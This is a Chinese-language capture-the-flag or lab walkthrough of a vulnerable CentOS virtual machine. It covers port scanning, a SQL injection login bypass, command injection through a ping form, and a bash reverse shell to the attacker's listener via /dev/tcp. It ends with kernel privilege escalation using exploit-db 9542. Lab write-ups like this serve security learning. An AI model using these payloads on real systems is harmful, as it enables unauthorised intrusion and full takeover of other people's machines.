arp-scan -l
扫出来多的那个就是
nmap
map scan report for 192.168.189.164
Host is up (0.00054s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/https?
|_ssl-date: 2020-04-19T08:22:47+00:00; -3h09m39s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
631/tcp open ipp CUPS 1.1
| http-methods:
|_ Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open mysql MySQL (unauthorized)
先进80看看
直接登录框
当然要先试试sql注入了admin' or '1'='1
,密码随便
进去后是这个ping
如果你ping的后面加上 & 后面才插命令,它也会执行,这里就可以加弹shell命令。这个在hackthebox里也有类似的靶机,参考crono
后面换上自己的地址
10.10.14.3 & bash -i >& /dev/tcp/192.xxx.xxx.xxx/4444 0>&1
本机打开监听,收到
先用这个把shell变成tty方便一些
python -c 'import pty; pty.spawn("/bin/bash")'
然后准备我做所有linux机的老套路linpeas.sh。但是执行不了。。奇怪。。home的文件夹也进不了
我觉得自己想复杂了。先看下uname -a
版本信息2.6.9很老、、直接提权就行了
用这个提权工具
./linux-exploit-suggester.sh -k 2.6.9
搜出很多建议
在里面打开网页找哪个是提权相关的
比如这个
[+] [CVE-2009-2698] ip_append_data
Details: https://www.exploit-db.com/exploits/9542/
Exposure: less probable
Tags: fedora=4|5|6,RHEL=4
Download URL: https://www.exploit-db.com/download/9542
打开相应网站,也写了Privilege Escalation提权,版本也对得上
就这个。下载下来。python -m SimpleHTTPServer 80
开启本机的80,wget到/tmp,毕竟tmp,权限很松,都有写,修改文件的权限
gcc 9542.c -o 9542
执行,成功root